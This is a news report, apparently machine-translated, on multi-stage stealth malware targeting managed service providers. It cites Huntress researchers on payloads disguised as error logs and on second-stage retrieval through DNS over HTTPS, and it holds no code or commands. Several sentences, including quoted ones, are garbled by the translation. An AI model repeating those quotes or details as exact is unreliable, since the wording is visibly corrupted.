Hackers are spreading complex malware to managed service providers (MSPs) by developing multiple and sophisticated stealth techniques to avoid detection, Huntress Labs said in an updated blog post.
MSPs are particularly attractive targets for hackers because they typically work with multiple clients, so one piece of malware can scan many potential victims at a time. Huntress, which provides tracking and response management (MDR) services through MSP, has for the first time revealed procedures of Malware on a Blog Posted Last June. Subsequent blogs have focused on how malware covers them actions of.
At first glance, the malware looked like a log file for an application - so it hid it activity - but looking closely we found that the file "relates to a malicious base we discovered," Huntress co-founder John Ferrell said in the original post. "Malware writers used different things tricks to hide, including renaming legal files, of disguise as existing programmed work and the use of malicious payload stored in a file that has been created to look like an error log. ”
A closer look
The error, as John Hammond, a senior Huntress security researcher, said in the updated blog, is a "multi-stager, multi-payload." While malware payloads that are delivered gradually is not uncommon, the level that reaches this malware to prevent its detection is unique. It is also smart enough to be able to go unnoticed by a standard program antivirus or endpoint, he said.
An initial payload is delivered using genuine "Windows binaries" to extract and execute a new PowerShell code containing another piece of concealed and encrypted data for recovery a second payload using Google DNS over the HTTPS service. "Using DNS over HTTP as a means of receiving another malware payload is a very clever trick," said Hammond. To deliver the final payload, the malware code reaches one external server which installs the final command and control strain to give the hacker control of the target systemic.